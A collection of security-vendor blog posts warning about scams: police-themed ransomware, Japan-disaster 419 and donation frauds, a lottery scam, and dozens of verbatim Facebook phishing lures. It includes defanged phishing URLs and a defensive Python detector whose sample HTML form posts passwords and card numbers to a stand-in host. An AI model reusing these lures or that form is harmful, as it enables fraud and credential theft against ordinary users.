Tag Archive | "Scam"

Federal Police Scam

During routine malware analysis we found a sample that displays a fake warning posing as an official notice from the German “Bundeskriminalamt” (the German Federal Police). The page contains various logos taken from the official websites.

It is easy to see that this page is not from the federal police: it gives a free mail address at yahoo.com and is full of grammatical mistakes and typos. The malware authors try to pressure victims into paying 100 € via an anonymous payment service called “UKash” to unlock the infected PC. Should the victim fail to pay within 24 hours, the criminals threaten to delete the entire contents of the hard disk.

Immediately after execution, the malware creates two files inside the temporary directory and runs them. The dropped files are detected by Avira AntiVir as TR/Dldr.PinchLord.C and TR/Dldr.Harnig.S.210.

Once these files have been dropped and executed, they try to download further malware components from bal***on.com.

Avira users are protected from the threat with VDF version 7.11.05.134. The main malware is detected as TR/PSW.Papras.A.2.

Heng Chia Ho
Virus Researcher

Posted in Avira

“Help us escape Japan” scam mail

Here’s a freshly minted scam mail doing the rounds – this time, claiming to be a victim trying to escape Japan and needing a cool $ 1,600 to do it.

From: jamainelecottATyahoo.com
Subject: Please Help Life, From Jamaine Lecott

Hello Dear Friend

My Name is Jamaine Lecott

i am in hurry writing you this message and i hope you get it on time, there was very hard quake here in my country northeastern coast in japan. It has been a very sad and bad moment for me and my family here, the present condition that we found myself is very hard for me to explain.i want us to be out of the country immediately i am asking for help of ($ 1,600 ) only to raise our ticket charge and some other expenses to leave here I will appreciate whatever you can afford to assist me and my family so that we can have food and eat to be out of the country i will be very happy for that , we lost every thing we have Please send the money via Western Union money transfer channel because that is the only way we could be able to get the money fast and leave. which country are you transferring the money from please help us with thanks GOD will help you also and bless you…

ADDRESS.NO A14 Tokyo. northeastern coast japan
My Honest Regard,
Jamaine Lecott

Needless to say, you should not get involved in this.

Christopher Boyd

Posted in GFI Software

ICRC Japan donation scam mails

The scammers are in full swing now, aren’t they?



Thanks to Mister U, thenext50k and others for sending over various pieces of spam mail that Twitter users are reporting seeing arrive in their mailboxes.

The example mail above claims to be from “ICRC Basedhelping Foundation” and is, unsurprisingly, asking for Japan relief donations. They’ve provided bank details so you can send them money from both inside and outside Europe (nice of them), and these unsolicited mails should be dumped into your spam folder as quickly as your fingers will allow.

Christopher Boyd

Posted in GFI Software

A Japan themed 419 scam…

Thanks to thenext50k for sending this over.

From: “Paul Anderson”
Date: Thu, 17 Mar 2011 20:33:07 +0100

Subject: Urgent response as regards the Japan Earthquake, Tsunami
Private and Confidential

Firstly, I apologize for sending you this sensitive information via e-mail instead of a Certified mail/Post-mail. This is due to the urgency and importance of the information. This project is based on trust, confidentiality and sincerity of purpose in order to have an acceptable meeting of the minds. I am the account manager of Unity Bank Nigeria, West Africa with branches all over the world and almost in all parts of Asia. My name is Paul Anderson and I work both as an auditor and a consultant with the bank.

11 years ago, an expatriate, a Japanese from Tokyo Japan whom was also a client of the bank I work for successfully invested the sum of $ 26.2M USD with the bank I work for. On routine audit check I discovered that this investment account have remained dormant for some years. An investigation regarding the status of the account was carried out. However, during the course of the investigation, it was then revealed that the account holder (Expatriate and Investor) died in the Tsunami Earthquake disaster which took place on March 16, 2011 while on vacation. It was also discovered that the late client died intestate (died without a valid will) as he has no relation that knows about this deposit. Until his sudden demise, He was not married and was 44 years old.

NOW THE CRUX OF THIS E-LETTER is that banking regulation/legislation in Nigeria, demand that I notify the fiscal authorities after a statutory time period when dormant accounts of this type are called in by the monetary regulatory bodies. If no beneficiary to the investment account is presented as the late client’s next of kin within the next 14 official working days so that He or She can be paid the outstanding USD 26.2 Million dollars, the funds/payment will be diverted to the government coffers account as unclaimed bill and it may surprise you to know that funds of this nature are usually embezzled and diverted by corrupt government officials into their pockets to be used for their own selfish gains The above set of facts underscores my reason of writing and making this proposal.

Since we have been unsuccessful in locating any of his relatives, I decided to contact you for a deal so that we can work together as a team to remit the money to your account as my client next of kin since I do not want to sit and watch my client’s hard earned entitlement to go astray, it will be easy for us to achieve because you are of the same name like him. Although I know that a transaction of this magnitude might make anyone apprehensive but I would like to assure you that I am proposing this project to you with the best of intentions.
All I require from you is your honest co-operation to enable us seal this deal through. I guarantee that this transaction will be executed under a Legitimate banking arrangement that will protect you from any breach of law. Upon successful conclusion of this project, you will be compensated with 40% of the total fund, while 60% will be for me.

If you are interested to work with me in this deal of mutual benefit, kindly reply strictly to my personal Email: stating your full names, telephone, fax and mobile numbers for effective communication and oral clarification on how to proceed next, postal address, occupation and position held, scanned photocopy of your identification in the form of international passport or driver’s license or other to enable us prepare all necessary bank papers to effect the quick release of the funds into your nominated bank account.

Sincerely yours,

Paul Anderson.
 
I’m struggling to think if there’s any kind of scam left untouched where the Japan quake / Tsunami is concerned.

Christopher Boyd

Posted in GFI Software

Phishing Scam in an HTML Attachment

In a traditional phishing scam, a phisher usually sets up a website with a fake login form imitating a legitimate online service such as a bank, social networking website, auction site or payment processing service. In an attempt to lure in users, the phisher spams a link to the website through email or instant messaging. Unfortunately for the phishers, modern browsers like Mozilla Firefox and Google Chrome have become quite good at detecting phishing, immediately warning users when a potential phishing site is being opened.

Mozilla Firefox and Google Chrome warning users of a phishing site.

Phishers, however, have found a way to circumvent this anti-phishing protection: attaching an HTML file to the spam email. This technique avoids the HTTP GET request to the phishing site, and so avoids being blocked by the browser. For example, take a look at these spam samples:

Multiple samples from a phishing spam campaign with an HTML attachment.

The HTML attachment, stored locally, successfully opens in the browser without the user being warned.

Sample of a phishing HTML form targeting PayPal users. The HTML file is saved in the local directory.

When the victims enter their information and click the “Agree and Submit” button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate web server (in one case, Fritolay.com).

Stolen information is usually sent to a PHP script on a hacked web server. (Note: we notified Fritolay of the offending PHP file and observe that it has now been removed.)

The phisher’s PHP script then redirects the browser to Paypal’s homepage after successfully submitting stolen information. While the POST request sends information to the phisher’s remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity. Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective. Logically, however, the browser should be able to detect a URL when the browser sends the POST request. So what makes this type of phishing tactic harder to detect from the browser perspective?  Here’s a couple of reasons:

1. Few PHP URLs are reported as abuse.  Average users are not able to report any URL because no phishing URL is visible, unless they are technical enough to view the HTML source code.

2. The URLs are hard to verify as phishing sites. The URL alone, without the accompanying HTML form, would be hard to verify as a phish site because the PHP script runs on the server and no visible HTML is displayed after clicking the submit button; the browser is simply redirected to the target brand’s homepage.

We have seen an increase in these types of phishing spam campaigns over the last few months. Last month we blogged about a clever phishing campaign targeting Bank of America online users that uses this same phishing tactic. So be wary of HTML attachments included in an email.  If the email seems suspicious, avoid opening the HTML attachment. And if you do happen to open it, be particularly leery of any HTML form requiring you to enter sensitive information.
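A defensive check for the technique described above, as an added example that is not code from the original post: it walks a message's MIME parts, parses any HTML attachment, and reports forms that submit password- or card-like fields to an absolute http(s) URL. The sample message, the host `compromised-site.example`, the field-name hints and all function names are assumptions constructed for illustration.

```python
"""Audit e-mail HTML attachments for forms that POST credentials to a remote host."""
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings of input names that suggest sensitive data (assumed heuristic list).
SENSITIVE_HINTS = ("pass", "pwd", "card", "cvv", "ssn")

# Constructed sample attachment; the host and field names are made up.
SAMPLE_HTML = """<html><body>
<form action="search" method="get"><input type="text" name="q"></form>
<form action="http://compromised-site.example/images/update.php" method="POST">
  <input type="text" name="email">
  <input type="password" name="password">
  <input type="text" name="card_number">
  <input type="submit" value="Agree and Submit">
</form></body></html>"""


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        attr = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": attr.get("action", "").strip(),
                          "method": attr.get("method", "get").lower(),
                          "fields": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["fields"].append(
                (attr.get("type", "text").lower(), attr.get("name", "").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def audit_html(html):
    """Return forms that send sensitive-looking fields to an absolute http(s) URL."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        target = urlparse(form["action"])
        # A relative action cannot reach a remote server when the file is opened locally.
        if target.scheme not in ("http", "https") or not target.hostname:
            continue
        fields = [name or ftype for ftype, name in form["fields"]
                  if ftype == "password" or any(h in name for h in SENSITIVE_HINTS)]
        if fields:
            findings.append({"host": target.hostname, "action": form["action"],
                             "method": form["method"], "fields": fields})
    return findings


def audit_message(raw_bytes):
    """Audit each HTML part or .htm/.html attachment of a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    results = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename() or ""
        if part.get_content_type() != "text/html" and \
                not filename.lower().endswith((".htm", ".html")):
            continue
        payload = part.get_payload(decode=True) or b""
        try:
            html = payload.decode(part.get_content_charset() or "utf-8", errors="replace")
        except LookupError:  # unknown charset label in the MIME header
            html = payload.decode("utf-8", errors="replace")
        for finding in audit_html(html):
            finding["attachment"] = filename or "(inline HTML part)"
            results.append(finding)
    return results


def build_sample():
    """Build a constructed spam message carrying SAMPLE_HTML as an attachment."""
    msg = EmailMessage()
    msg["From"] = "service@notice.example"
    msg["To"] = "user@mail.example"
    msg["Subject"] = "Your account has been limited"
    msg.set_content("Please open the attached form to restore access.")
    msg.add_attachment(SAMPLE_HTML.encode("utf-8"), maintype="application",
                       subtype="octet-stream", filename="Restore_Account.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for f in audit_message(build_sample()):
        print(f"{f['attachment']}: {f['method'].upper()} {f['fields']} -> {f['host']}")
```

A mail gateway could quarantine on any finding, since a legitimate sender has little reason to ship a credential form as an attachment.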

Posted in Security

Lottery scam in German

Our spam traps are being flooded by a new lottery scam sent as a PDF attachment to spam mails. What initially looked like some kind of exploit for Adobe Reader, because of the attached PDF document, proved to be a simple scam. The emails are between 600 and 700 KByte in size and all contain the same PDF document. However, we’ve seen several variants of the email text, which usually consists of only a couple of lines. We saw immediately that this was not just any type of scam: it was a lottery scam written in German and coming from Spain. As can be seen in the subject, it wasn’t completely translated, because it contains the word “Won” in a sentence that was intended to be written in German.

The PDF file itself looks interesting and it indeed refers to the same amount of money as has been written in the email. This is not usual in such scams.

We don’t often see lottery scams written in German, and until now we had never seen a lottery scam delivered as a PDF file. We are not familiar with the telephone numbering system in Spain. It would be interesting to know whether the telephone number to which the victim should fax the form is an ordinary number or a special service number, possibly with very high rates.

However, the story, written in less-than-correct language, is not convincing, and we advise our readers never to fall for such stupid scams.

Sorin Mustaca
Data Security Expert

Posted in Avira

World Record for Disaster Scam Site?

Approximately two hours after an 8.9 earthquake hit northeast Japan we spotted the first potential donation scam site. We’ve seen this before of course, but for a scam site to appear in just two hours–indexed and with content–is pretty damn quick in my experience. Hundreds of domains that could be related to the disaster have been registered so far today; we’re keeping an eye on them.

Please ensure that when you donate to victim relief efforts, you do so through legitimate sites.

  1. .Org domains are cheap. Registering does not authenticate charitable status in any way. Verify that the organization is actually a registered charity.
  2. Domain solicitations that arrive by unsolicited email, especially those sounding overly urgent or desperate, are very likely to be scams
  3. The same goes for advertising banners
  4. If you’d like to help, I recommend you support one of the major international organizations that have a “most in need” fund

The types of scams to expect are fake donation and charity sites (including charity phish), 419 variants, fee based loved-ones locators, tweets pointing to scams and, of course, exploit-laden search-engine optimized sites installing malware.

This post from our cybersecurity mom, Tracy Mooney, on charitable giving may also be of use.

Stay safe!

Posted in McAfee

ChronoPay and the ICPP scam

Once again, Brian Krebs sets the bar for data security bloggers. In his latest blog posts he details how Russian online payment processor ChronoPay is linked to various types of online crime.

Especially interesting is their link to the ICPP Copyright Foundation extortion case.

icpp-online fraud

We blogged about this case in April 2010, when this trojan was being distributed widely. It would lock infected computers, showing a list of copyright infringements found from the system. It would not unlock the system unless you used your credit card to pay “fines”.

Emails leaked to Krebs show that ChronoPay was directly involved with the scam. Even the topic of the email shown below is titled “icpp-online.com Fraud Rate”.

icpp

Read the full story from Krebs On Security.

On 04/03/11 At 12:26 PM

Posted in F-Secure

Free tickets on Southwest Airlines? It’s the latest Facebook scam

Facebook users should beware the latest scam doing the rounds on the social network. A so-called opportunity to win free tickets with Southwest Airlines may look like a dream come true, but in fact is an opportunity for scammers to harvest your information.

Naked Security reader Wayne told us that he’d seen the messages being spread from the Facebook account of his daughter and her work colleagues, and further investigation found other users’ accounts being used to spread the scam links.

What’s interesting, as our friends at Facecrooks point out, is that the messages are being spread via comments on other users’ walls rather than as status updates.

Messages include:

sweet! i just got 2 free flight vouchers from Southwest Air to fly to any destination i can think of lmao! i didnt believe it would work but it was, got it here..[LINK] try for yourself i just figured i would share with everyone

hey, i got my free Southwest airfare from [LINK] u should submit for a your own pair while they are still offering them!

hi, i just got my free Southwest airfare from [LINK] you should claim your own pair while its still available!

Southwest is offering complementary flights..but for a short time only: [LINK]

wassup, i just picked up my free Southwest tickets from [LINK] you should request yours while its available!

If you do click on the links you’re taken to a webpage which looks like the genuine Southwest Airlines website, but instead urges you to connect with it via Facebook.

Scam website

The offer of free tickets may have proven too attractive a lure, of course, and so you might agree to proceed – whereupon you are greeted with the all-too-familiar sight of a Facebook dialog asking for your permission to install a third-party application.

Southwest rogue application

This rogue application can access your profile, and post messages from your account – allowing the scam to spread widely.

Southwest 30 second wait

You’ll then be presented with a series of questions and offers, which scoop up your personal information. Would you be prepared to give this level of information about yourself to a complete stranger in the street? (Well, perhaps you would as the video we made on the roads of Bristol proved..)

But you shouldn’t be so keen to share your personally identifiable information, especially when you cannot be sure what is going to be done with it.

Will we see more of these air ticket-related scams in the future on Facebook? I would bet money on it. After all, everyone dreams of the idea of flying off somewhere without having to pay for the privilege. In the past, we’ve seen Facebook scams regarding free tickets with JetBlue and Delta Air Lines, so it’s not really a surprise to see the latest scam use a similar ploy.

If you have been hit by scams like this on Facebook, and are struggling to clean-up your profile, here’s a YouTube video I made which describes what steps you need to take:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you keep informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos page on Facebook, where over 60,000 people regularly share information on threats and discuss the latest security news.

You could also do a lot worse than check out our best practices for better privacy and security on Facebook guide.

Posted in Facebook, Sophos

This is how hackers steal your Facebook password

There are many attackers out there who want to steal your credentials. And no doubt Facebook, as one of the largest social networking sites in the world, has always been a target for the bad guys.

Let’s take an example from the following message:

Your facebook account will be closed for security reasons, because disruptive or insulting other facebook users. violates our Terms of Use, which can be blocking your account.

If you believe this is an error, Please follow the link below to verify and fill out the form of as agreement :

hxxp://customer-supports-account.webs.com/facebook-security/

We apologise for any inconvenience caused. If you not confirm, we will disable your account permanently.

We declare that you have read this information.

Thanks,
The Facebook Team

Facebook © 2011. All Rights Reserved.

Using social engineering, the attacker tries to lure users by claiming that the email comes from the Facebook Team.

When you click on the given link, it shows the following screen, which looks similar to the Facebook login page:

phising-page

This page actually calls another malicious site:

  • hxxp://djarum-black.24.eu/

As you can see here, every time you enter the password, this script calls “incorrect.php” and shows you a message saying that the password you entered is wrong. In fact, your login information has been recorded by the attacker in the background. They are now able to change your original password and can do anything they want.

code

And here are other scam messages that you may receive:

Your facebook account will be closed for security reasons, because disruptive or insulting other facebook users. violates our Terms of Use, which can be blocking your account.

If you believe this is an error, Please follow the link below to verify and fill out the form of as agreement :

http://malicious_links/

We apologise for any inconvenience caused. If you not confirm, we will disable your account permanently.

We declare that you have read this information.

Thanks,
The Facebook Team

Facebook © 2011. All Rights Reserved.

You perform actions that may be considered disturbing or offensive.
Your account has been reported by other users.
Your account will be blocked within 1×24 hours.

to cancel the blocking follow this link:

http://malicious_links/

Thank you,
Facebook Team

We get reports that your account was made a few mistakes, and is ensured by our team that there were errors in the use of social networking (facebook).
To ensure that this account belongs to you, we need your cooperation.
If you ignore this message and do not follow our policies, we are forced to deactivate or suspend your account.
The deadline for your confirmation for 24 hours starting from this incoming message.

To complete the process, please follow the link below:

http://malicious_links/

Confirmation Code: q0w8i32j

This message is not a scam, if you’re not sure you can change your facebook password and email after registering.

In the future, all warning of security will come through the Facebook Security. To receive future updates to Facebook’s site security, become a fan of the Page.

Copyright © 2010 by the Present Facebook ™
All rights reserved.

Your account will be deactivated immediately.Because someone has reported your actions.Maybe you have written content that is abusive. Or upload a picture that can be insulting or harmful to other users.You must confirm your account, to stop the warning deactivated on your account. Please re-confirm your account at:

http://malicious_links/

We provide 1×24 hours to re-confirm your facebook account. If not, we will block your account for the benefit of other users.

If you receive a message like this, please do not click on the given link! This link will lead to a phishing page.

Your account has been reported other users on the grounds of violating the provisions facebook:

1. fake profiles
2. porn photo
3. conduct phishing
4. insulting others
5. threatening others
6. inappropriate chat
7. contains pornographic images
8. conduct violation Terms of services (TOS)

facebook does not allow to do actions that are considered disturbing or offensive by other users.
please make confirmation within 24 hours, if you feel there has been a mistake.

IIf you do not confirm, the system automatically shut down your facebook account will be permanently on the assumption that the indications are correct.

Thank you for helping improve our service.

facebook ™ security
© 2010 copy right facebook network inc.

for cancellation, please confirm your facebook account below:

http://malicious_links/

Because too many users of this service, we decided to disable some unused accaunt in anticipation of damage to our network.

re-confirm your account here to help our checking account is not used anymore.
click our link below as your statement that accaunt still being used:

===============================

http://malicious_links/

===============================

You must verify your e-mail address before you can use it on facebook service

Attention:
If you do not re-confirm your account immediately, we are not responsible if your account will be disabled automatically by our system.

Thank you for using our services.
Facebook™ Gаmе пеtwогκ іпс
соρугіgһt © 2010 Facebook, іпс.. а׀׀ гіgһtѕ геѕегvеd.

Your account has been reported by other users for reasons that are not allowed to facebook.
facebook does not allow to do actions that are considered annoying or insult other users.
please confirm if you feel there have been mistakes, if you have not been confirmed, the system will automatically close your facebook account permanently.
please confirm your facebook account below :

Facebook Securitγ™ | Confirm Account

http://malicious_links/

Cоpγright © Facebook 2010, пеtwоrk Iпc.

Your facebook account will be closed for security reasons, because disruptive or insulting other facebook users. violates our Terms of Use, which can be blocking your account.

If you believe this is an error, Please follow the link below to verify and fill out the form of as agreement :

http://malicious_links/

We apologise for any inconvenience caused. If you not confirm, we will disable your account permanently.

We declare that you have read this information.

Thanks,
The Facebook Team

Facebook © 2010. All Rights Reserved.

Facebook security systems found indications that you have violated the “Terms of Service ‘(TOS) to do a post that contains :

1.Upload photos or images that violate the conditions of use facebook
2.Copyright infringement
3.Pornography or contains nudity
4.Insults, hateful, threatening, inciting, or acts of violence
5.Perform actions that interfere with another user and you have been reported by other users

Please confirm within 24 hours if you feel there has been a mistake.
If you do not confirm, the system will automatically close your facebook account or permanently disabled with the presumption that such indication is correct.

Please confirm your facebook account by clicking the link below:

http://malicious_links/

Thank you for helping improve our service.

Facebook ™ security
Facebook @2010 copyright network inc

Your account has been reported by other users reasons that are not allowed. Subject of:

1. Fake profiles
2. Fake Photo
3. Perform post
4. Insulting others
5. Threatening another person
6. Chat inappropriate
7. Contains pictures porn
8. Violation of Terms Of Service (TOS)

Facebook does not allow to do actions considered to interfere with or insult other users. Please confirmation within 24 hours. If you do not confirm, then the system will automatically deactivate your facebook account permanently with presumption that such indication is correct.

Thank you for helping improve our service.

Facebook™ security
Facebook © 2010 Copyright Network Inc.

If you feel there has been a mistake. Please confirm your facebook account on the PAQ below: WARNING! YOUR ACCOUNT WILL BE DISABLED

Our system has received numerous reports from other users about the misuse of your account, and it can cause your account will be suspended or disabled. Sometimes users get this warning because of abusing one of our features.

The reason for this is not limited to:
• Fake profile
• Incompatibility in your profile photo or album
• Those who distribute racist or sexy comments
• mailing systems Abuse Facebook
• Register more than one unique account

If you promise not to do things that violate the terms of service for the second time, our team is still giving direct policy to confirm your account that allows you to use your account again.

For confirm your account, please visit at:

http://malicious_links/

If within 24 hours after you receive information from us you are not immediately confirm the account, your account automatically will be disabled permanently.

Thank you
Regard,
Facebook ™ Security

Notice! Your account till now unconfirmed.

Facebook requires users to confirm the account as the respective proof of the authenticity of the account owner.
This is in because many people using false identities in their profile violates our Terms of Use which can be lead to blocking your account temporarily or account permanently closed.

If you are the original owner of this account immediately to confirm your account are at our FAQ

http://malicious_links/

To stop blocking
This or within 24 hours of account
we will switch you.

Thank you for your understanding.
█║▌│█│║▌║││█║▌║▌║
0111 8802 5334 9991 102

Rescue Operations Analyst ** Facebook © 2010 **

Suspicious activity detected on your Facebook account (i.e. it looks like you were violating our Terms of Service (“TOS”));
we will being permanently suspended your account.
If you agree to reinstatement terms your account.
Please follow instructions below to request reactivation.

Please contact customer service or
You are required to confirm your account at below :
———————–

http://malicious_links/

———————–

Attention:
If you don’t verify your account, then your account disabled automatically by our system.

Kind Regαrds,
Fасеbооk Sесυгitу .Iпc ™
Cоρугigнт © 2010 Sаfеtу Fасеbооk Lтd.
█║▌│█│║▌║││█║▌│║▌║
apps.facebook.com

We get the information from our security system that your account was reported by someone because doing:

► Transferring chiрs thrоugh lоsing and (selling).
► Cheating оr multiрle accоunts.
► Harassment, bullying, оr viоlent threats against оther user.
► Buying оr selling virtual gооds.
► Оffensive, disgusting, оr shоcking acts.

if you feel this is a misunderstanding or false accusation you must confirm your account!

Please confirm your account here:
▬▬▬▬▬▬▬▬▬▬▬

http://malicious_links/

▬▬▬▬▬▬▬▬▬▬▬

Within 24 hours if you do not confirm it, then the game “Texas Holdem Poker” in your account will be subject to sanctions in the form of temporary or permanent suspension, assuming that the allegations were true.

Thank you for improving our services
▬▬▬▬▬▬▬▬▬▬▬

http://malicious_links/

▬▬▬▬▬▬▬▬▬▬▬
Zуnga gamеѕ nеtшоrκ іnс. рaсе роκеr Bооκѕ
Attn: іntеllесtual ρrоρеrtу Agеnt
444 DеHarо ѕt., ѕuіtе 132
ѕan Franсіѕсо, сalіfоrnіa 94107th
█║▌│█│║▌║││█║▌│║▌║

Your account has been reported by other users with reasons that are not allowed in facebook, regarding about:

1.Fake profiles.
2.Your use of excessive application.
3.Identity fraud on your account.
4.You write content that is not fun (ROUGH).
5.Using facebook account just for the games applications.

Please confirmation within 24 hours if you feel there has been a mistake. If you do not confirm, the system will automatically close your facebook account or permanently disabled with the presumption that such indication is true.

For cancellation, please confirm your facebook account below:
▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬

http://malicious_links/

▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬ ▬
Thank you for helping to improve our services.

Facebook ™ Security
Facebook © 2010 Copyright Network Inc.
█║▌│█│║▌║││█║▌│║▌║

Blocking υp Accoυnt, Immediate Verification.
Violation – Facebook Terms of Service Warning! Your account could be disabled…

Blocking υp Accoυnt, Immediate Veгification.
Between You and Facebook Șecurity
Facebook Șecurity December 3 at 5:27pm Report
Violation – Facebook Terms of Service
Warning! Your account could be disabled.

Yoυr behavior indicates that you may be in violation of Facebook’s Terms of Use. Continued misuse of Facebook’s features could result in your account being disabled.

The гeasoпs your facebook account will be disabled:

1. Your account has been reported by some people
2. Fake profiles
3. Identity fraud on your account
4. You write content that is not fun (ROUGH)
5. Using facebook account just foг the games applications.

If you have never done this violation, please verification your account here:
============================

http://malicious_links/

============================

If you do not verification within 24 hoυrs, facebook secυrity system will disable your account. If you do not confirmed, the system will aυtomatically shut your facebook account permanently with the presumption that such indication is true.

Tһank you for helping to improve our services.

Facebook ™ Security
Facebook © 2010 Copyright Network Inc.
█║▌│█│║▌║││█║▌│║▌║

Facebook security system found indications that you are in violation Terms Of Services (TOS) to do a post containing:

1.You are violating copyright law No.32 of 2004 facebook about online
2.Upload photograph or image that violates the conditions of use facebook
3.Violation copyright
4.Pornografi or contains nudity
5.Humiliation, hateful, threatening, or inciting violence action
6.Take actions that disrupt or insult other users and you
have been reported by other users.

Please make confirmation within 24 hours if you feel there has been a mistake. if you do not confirm, the system automatically to your facebook account permanently assuming the correct indication

Note: please confirm your facebook account on the following link:

http://malicious_links/

Thank you for helping improve our service.

Facebook ™ security
Facebook © 2010 Copyright network Inc

Your account will be deactivated immediately.
Because someone has reported your actions.
Perhaps you have written content that is offensive or upload an image to insult or harm other users.
You must confirm your account, to stop the warning disabled
on your account.
Please confirm address below:
***************************

http://malicious_links/

***************************

“CAUTION”
Please confirm within 1×24 hours to fix your account. If not, our system will automatically close your facebook account permanently with the presumption that such indication is correct.

FACEBOOK ™
соρугіgһt © 2010 Facebook, іпс .. а | | гіgһtѕ геѕегvеd.

Your account will be immediately deactivated .someone has reported your actions. Maybe you have written content that is abusive and upload a picture that insulting or harmful to other users. You must confirm your account, to stop deactivation on your account.

Please confirm your account here:

► http://malicious_links/

if within 24 hours you do not confirm , the system will automatically close your facebook account (disabled), with the presumption that such indication is true.

This policy is designed to ensure permanent facebook social networks that are safe, comfortable and reliable for all users.

Thank you for helping to improve our services.
Facebook Team Security 2010
Terms of Intellectual Property and Security Policy

You are engaging in behavior that may be considered annoying or abusive by other users. You should be continue this phase for confirmation, if you don’t re-confirm, our system will automatically disabled the account permanently.
Please update your account here :

http://malicious_links/

Thanks for using our services.

NOTIFICATIONS!!

Your account will be banned or suspended or otherwise violate the requirements for facebook / poker texas holdem
to avoid suspension or banning of your account, please use the support feature to send an email to our terms of demand for administrators to avoid any actions taken by Zynga. / Facebook team
after you have registered, you can contact our customer service team directly by clicking the link below to confirm your account:

http://malicious_links/

Note: This site is created by Zynga / Facebook Team to give you a chance to confirm your account before your facebook account in the block or in the report.
And Tim Zynga / facebook only provide confirmation of 1×24-hour time limit …!!!
please support us with all the information you need to think to ask about this website.

Facebook Security Team. Inc ™
Copyright © 2010-2011

Facebook Security Team have reports there are some mistakes that are not in accordance with the feasibility of using your facebook, among others:
1. Using the application of excessive
2. Identity fraud on your account
3. Using pictures that are considered annoying
4. Insulting other users

To clean all of the allegations about your account, please visit Facebook Security customer support here :

=============================

http://malicious_links/

=============================

Attention !
If you ignore the message of this policy, we are forced to deactivate your account. Thank you for your cooperation

Facebook Security Services ™ 2010

Our security system detects suspicious activity on your account that violates the Terms of Service (TOS) in the form of posts that contain pornography, contempt, hatred, threaten, incite, violence, violations of copyrights or contains nudity.

Please confirm your account within 24 hours if you feel there has been a mistake. If you do not confirm, the system will automatically close your facebook account permanently with the presumption that such indication is correct.

Thank you for helping improve our service.

Facеbооk ™ Security
Facеbооk © 2010 Cоpyгіght Nеtwоrk Inc.

Please confirm your facebook account on the following link:
Facebook Account Confirmation

http://malicious_links/

Please confirm your Facebook account immediately to avoid disable account permanently. We apologize for this inconvenience.

Our system found recently accessed your account from a location unknown to us. For your protection, please review your last activity to make sure nothing is using up the account without permission.

Reviewing your activity requires only a few moments. We’ll start by asking a few questions to confirm that this is your account. (If we recognize your computer, you will be able to skip this step.).

Please verify your account within 24 hours, if you ignore then we will block this account for your security.

Please verify your account here:
_____________________________________________________

http://malicious_links/

_____________________________________________________

Thanks for Helping to improv our services.

Facebook ™ security
Facebook @2010 copyright network inc.
█ ║ ▌ │ █ │ ║ ▌ ║ │ │ █ ║ ▌ │ ║ ▌ █

ΑТТΕΝТІОΝ,youг accouпt will be deactivated iммediately . Because soмeone has reported your actions . Maybe you have written content that is abusiveoг upload a pictuгe that caп be insulting or harмful to other useгs.You must confiгм your account, to stop the waгning deactivated on youг account.Please гe-confiгm your account at:

http://malicious_links/

We provide 1×24 hours to re-confirm your facebook account. If not, we will block your account for the benefit of other users.

Facebook Team. Inc ™
By Copyright © 2010 Facebook, Inc. ..

Your account will be disabled.
Your account has been reported by another user with the reason violations,
- Insult other users
- misappropriated
- violate the rules on your account

If you believe this is an error , please click bellow to registration security your account :

http://malicious_links/

If within 12 hours you do not confirm to facebook security center, we will be banned your account.

Thank you, for your cooperation
Best regards, By Facebook Security™.
Сорүгіgһt © 2010 Security Νеtwогk Іпс. Аlŀ гіgһt геѕегνеd

Yоur ассоunt һаѕ bееn rероrtеd by аnоtһеr uѕеr wіtһ tһе rеаѕоn:
1. Іllеgаl trаnѕfеr сһір
2. Uѕіng inѕult wоrd tо оtһеr player

Please be sure to visit the Application Facebook Help Center

============================

http://malicious_links/

============================

Thanks,
Facebook Security Team

Your account will be deactivated immediately.Because someone has reported your actions.Maybe you have written content that is abusive or upload a picture that can be insulting or harmful to other users.You must confirm your account, to stop the warning deactivated on your account.

Please re-confirm your account at:

http://malicious_links/ <—–click here

We provide 1×24 hours to re-confirm your facebook account. If not, we will block your account for the benefit of other users.

Facebook Team. Inc ™
By Copyright © 2010 Facebook, Inc. ..
All rights reserved
█║▌│█│║▌║││█║▌│║▌

Your account has been reported, please list your account to prevent deferred account.
We just want to help you in securing your account.
To secure your account, visit the Facebook service center below:

►http://malicious_links/

If you do not register your account within 24 hours, your account will be suspended or deactivated.
Security of your account will be processed within 24 hours.

Тһаnk yоυ, yоυr fоr соореrаtіоn
Веѕt rеgаrdѕ, Вy Ѕесυrіty ™ Facebook.
Сорyrіgһt ™ © 2010. Аlŀ rіgһt rеѕеrved.

Аkυп αпdα теlαһ di lαрoгkαп olеһ репggυпα lαiп dепgαп αlαѕαп үαпg тidαk diрегbolеһkαп di Fαсеbook, Peгiһαl тeптαпg :

1. Pгofil рαlsυ.
2. Foto рαlsυ.
3. mеlαkukαп pоsтiпg.
4. meпgһiпα oгαпg lαiп.
5. mепgαпcαm oгαпg lαiп.
6. Obгolαп yαпg tαk pαпtαs.
7. bегisi gαmbαг теlαпJαпg.
8. mеlαkukαп pеlαпggαгαп тегhαdαp тегms оf sегvicеs (тоs).

Fαсebook тidαk mепgiziпkαп mеlαkυkαп тiпdαkαп Үαпg diαпggαр mепggαпggυ αtαυ mепgһiпα olеһ рeпggυпα lαiп.
